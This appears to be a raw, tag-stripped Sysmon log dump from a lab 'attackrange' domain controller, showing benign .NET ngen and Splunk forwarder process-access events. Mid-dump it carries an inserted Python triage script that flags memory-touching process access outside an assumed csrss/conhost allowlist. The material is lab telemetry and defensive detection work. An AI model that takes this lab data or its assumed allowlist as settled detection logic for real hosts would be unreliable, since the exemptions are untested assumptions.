Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AAD46F4AB092C262B72CE6B37D349A65,SHA256=21795E17BFE8B5556DE6914314DEF18B71CB15A6196FE2CCA5E5074AEDC6D844,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020360Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:53.487{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B9-60D3-6F03-00000000CF01}4376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020359Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.471{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1B9-60D3-6F03-00000000CF01}4376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020358Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:53.471{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B9-60D3-6F03-00000000CF01}4376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020357Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:53.362{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1B9-60D3-6E03-00000000CF01}6396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020356Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:53.331{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1B9-60D3-6E03-00000000CF01}6396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020355Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:53.331{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1B9-60D3-6E03-00000000CF01}6396C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020354Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:53.159{4DB9351A-A1B7-60D3-6C03-00000000CF01}2928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\b70-0\Microsoft.GroupPolicy.Reporting.dll2021-06-23 21:03:53.159 10341000x800000000000000020353Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000020404Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.319{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BB-60D3-7703-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020403Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.304{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1BB-60D3-7703-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020402Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:55.304{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BB-60D3-7703-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020401Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.226{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59D502FB1E80F9A1F23E67522CD91926,SHA256=2D59815D67DA51794946536F0CA4C7DA507F0A1EF22CF0804640013C3D006BB9,IMPHASH=00000000000000000000000000000000falsetrue 
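The records on this page are Sysmon XML with the element tags stripped, so every field of an event runs into the next. The parser below is an added example, not part of this page and not Sysmon or Splunk code. It recovers the header by using the fact that Sysmon's Task equals its Event ID, pulls out the ProcessAccess (Event ID 10) and ProcessCreate (Event ID 1) fields that triage needs, decodes GrantedAccess into named rights, and then reports only memory-touching access that neither the creating parent (whose CreateProcess handle is 0x1fffff), csrss.exe nor conhost.exe accounts for. The allowlist for csrss.exe and conhost.exe is an assumption of the example. The sample input is a constructed copy of seven records from this page with call traces shortened; the first chunk is a fragment cut at a line break, as in the dump, and Source PID and TID stay fused because the stripped format leaves no boundary between them.

```python
"""Triage for tag-stripped Sysmon records (added example, not Sysmon/Splunk code)."""
import re
from dataclasses import dataclass, field
from typing import Optional

# Header: EventID Version Level Task Opcode Keywords EventRecordID Channel. Sysmon sets
# Task == EventID, so the backreference \1 splits the fused digits; Keywords is fixed.
_HEADER = re.compile(r'^(\d{1,2})\d\d\1[0]0x8000000000000000(\d+)'
                     r'Microsoft-Windows-Sysmon/Operational(.*)$', re.S)
_UTC = re.compile(r'\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d{3}')
_GUID = re.compile(r'\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}')
# Event ID 10 body after UtcTime: SourceProcessGuid, SourceProcessId+SourceThreadId (fused),
# SourceImage, TargetProcessGuid, TargetProcessId, TargetImage, GrantedAccess, CallTrace.
_ACCESS = re.compile(r'^(\{[0-9A-F-]{36}\})(\d+)([A-Za-z]:\\.*?)'
                     r'(\{[0-9A-F-]{36}\})(\d+)([A-Za-z]:\\.*?)'
                     r'(0x[0-9a-f]+?)([A-Za-z]:\\.*)$', re.S)
# Records are separated by a single space followed by the next header.
_BOUNDARY = re.compile(r' (?=\d+0x8000000000000000\d+Microsoft-Windows-Sysmon/Operational)')

PROCESS_RIGHTS = {  # winnt.h process-specific and standard access rights
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD", 0x0004: "PROCESS_SET_SESSIONID",
    0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS", 0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION", 0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x2000: "PROCESS_SET_LIMITED_INFORMATION", 0x10000: "DELETE", 0x20000: "READ_CONTROL",
    0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER", 0x100000: "SYNCHRONIZE",
}
MEMORY_RIGHTS = 0x0002 | 0x0008 | 0x0010 | 0x0020  # enough to read, write or inject into a process
# Assumed allowlist (not from the page): csrss.exe and conhost.exe open every process they
# service with full access; the subsystem module must appear in the call trace as well.
SUBSYSTEM_HANDLES = {"csrss.exe": "basesrv.dll", "conhost.exe": "conhostv2.dll"}


@dataclass
class Record:
    event_id: int
    record_id: int
    utc_time: str
    fields: dict = field(default_factory=dict)


def split_records(text: str) -> list:
    """Split one dumped line into per-record chunks; the first may be a fragment."""
    return _BOUNDARY.split(text)


def parse_record(chunk: str) -> Optional[Record]:
    """Return a Record, or None for a fragment cut at a line break or an unparsable event."""
    m = _HEADER.match(chunk)
    if not m:
        return None
    event_id, record_id, rest = int(m.group(1)), int(m.group(2)), m.group(3)
    t = _UTC.search(rest)
    if not t:
        return None
    body, fields = rest[t.end():], {}
    if event_id == 10:
        a = _ACCESS.match(body)
        if not a:
            return None
        fields = dict(source_guid=a.group(1), source_image=a.group(3), target_guid=a.group(4),
                      target_pid=int(a.group(5)), target_image=a.group(6),
                      granted_access=int(a.group(7), 16), call_trace=a.group(8))
    elif event_id == 1:
        # ProcessGuid is the first GUID, ParentProcessGuid the last (LogonGuid sits between).
        # Assumes no GUID appears inside a command line.
        guids = _GUID.findall(body)
        if len(guids) < 3:
            return None
        fields = dict(process_guid=guids[0], parent_guid=guids[-1])
    return Record(event_id, record_id, t.group(0), fields)


def decode_access(mask: int) -> list:
    """Name the rights in a GrantedAccess mask; bits without a name are kept as hex."""
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    unknown = mask & ~sum(PROCESS_RIGHTS)
    return names + ([f"0x{unknown:x}"] if unknown else [])


def _is_subsystem_handle(r: Record) -> bool:
    module = SUBSYSTEM_HANDLES.get(r.fields["source_image"].rsplit("\\", 1)[-1].lower())
    return module is not None and module in r.fields["call_trace"].lower()


def triage(text: str) -> list:
    """Event ID 10 records with memory-touching access that no benign explanation covers."""
    records = [r for r in map(parse_record, split_records(text)) if r]
    parent_of = {r.fields["process_guid"]: r.fields["parent_guid"] for r in records if r.event_id == 1}
    findings = []
    for r in records:
        if r.event_id != 10 or not r.fields["granted_access"] & MEMORY_RIGHTS:
            continue
        if parent_of.get(r.fields["target_guid"]) == r.fields["source_guid"]:
            continue  # the creating parent holds a full-access handle from CreateProcess
        if _is_subsystem_handle(r):
            continue
        findings.append(r)
    return findings


# Constructed input: seven records copied from this page, call traces shortened,
# the first chunk being the leading fragment of a record cut at a line break.
SAMPLE = " ".join([
    r'21:03:55.864{4DB9351A-A1BB-60D3-7803-00000000CF01}65007104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd',
    r'10341000x800000000000000020412Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.661{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1BB-60D3-7803-00000000CF01}6500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781',
    r'10341000x800000000000000020411Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.661{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593',
    r'10341000x800000000000000020407Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.661{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1BB-60D3-7803-00000000CF01}6500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f',
    r'10341000x800000000000000020406Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.661{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1BB-60D3-7803-00000000CF01}6500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Windows\SYSTEM32\ntdll.dll+51781',
    r'154100x800000000000000020405Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.661{4DB9351A-A1BB-60D3-7803-00000000CF01}6500C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service',
    r'10341000x800000000000000020402Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.304{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BB-60D3-7703-00000000CF01}4728C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)',
])

if __name__ == "__main__":
    for r in triage(SAMPLE):
        f = r.fields
        print(f"{r.utc_time} record {r.record_id}: {f['source_image']} -> {f['target_image']} "
              f"(pid {f['target_pid']}) {' | '.join(decode_access(f['granted_access']))}")
```

On the sample, the svchost.exe handles on sysmon64.exe (0x1400, query rights only) drop out on the mask, splunkd.exe's 0x1fffff handle on splunk-powershell.exe is explained by the Event ID 1 record naming it as the parent, and the csrss.exe and conhost.exe handles fall under the assumed allowlist. What remains is record 20402, ngen.exe opening mscorsvw.exe with PROCESS_ALL_ACCESS; the example does not claim that is malicious, only that nothing in the sample explains it, which is exactly the set an analyst should look at. Anything the parser cannot decode is returned as None rather than guessed at, so a fragment cut at a line break never becomes a false record.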
10341000x800000000000000020400Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.210{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BB-60D3-7603-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020399Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:55.194{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1BB-60D3-7603-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020398Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:55.194{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1BB-60D3-7603-00000000CF01}5892C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020397Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:03:55.147{4DB9351A-A1BA-60D3-7403-00000000CF01}6120C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\17e8-0\Microsoft.Isam.Esent.Interop.dll2021-06-23 21:03:55.147 10341000x800000000000000020434Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:03:56.961{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1BC-60D3-7D03-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020433Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:03:56.914{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1BC-60D3-7D03-00000000CF01}6428C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020432Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
